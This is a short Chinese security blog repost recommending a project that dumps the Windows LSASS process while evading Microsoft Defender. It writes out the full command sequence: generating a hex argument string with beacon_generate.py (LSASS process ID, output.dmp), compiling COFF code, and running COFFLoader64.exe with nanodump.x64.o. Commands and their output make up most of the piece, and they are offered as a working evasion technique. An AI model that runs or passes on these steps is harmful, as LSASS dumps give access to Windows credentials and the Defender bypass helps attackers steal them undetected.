绕过Defender Dump Lsass进程(项目推荐)

admin 2023年12月4日02:53:45评论45 views字数 978阅读3分15秒阅读模式

这里推荐一个老外的Dump lsass进程的一个项目。

一般Dump lsass进程的方式都会被Defender拦截掉。

直接转储:

绕过Defender Dump Lsass进程(项目推荐)

使用rundll32.exe

绕过Defender Dump Lsass进程(项目推荐)

processdump:

绕过Defender Dump Lsass进程(项目推荐)

使用老外的项目:

python3 beacon_generate.py
python3 beacon_generate.py   Beacon Argument GeneratorBeacon>addint lsass进程IDBeacon>addString output.dmpBeacon>addint 1Beacon>addint 1Beacon>addint 0Beacon>addint 1Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>addint 0Beacon>addint 0Beacon>addString ""Beacon>addint 0Beacon>generateb'59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'Beacon>

编译文件

cd COFF-mastermake

落地执行:

COFFLoader64.exe go nanodump.x64.o 59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000

defender:

绕过Defender Dump Lsass进程(项目推荐)

项目地址回复20231202获取。

原文始发于微信公众号(Relay学安全):绕过Defender Dump Lsass进程(项目推荐)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月4日02:53:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   绕过Defender Dump Lsass进程(项目推荐)https://cn-sec.com/archives/2262954.html

发表评论

匿名网友 填写信息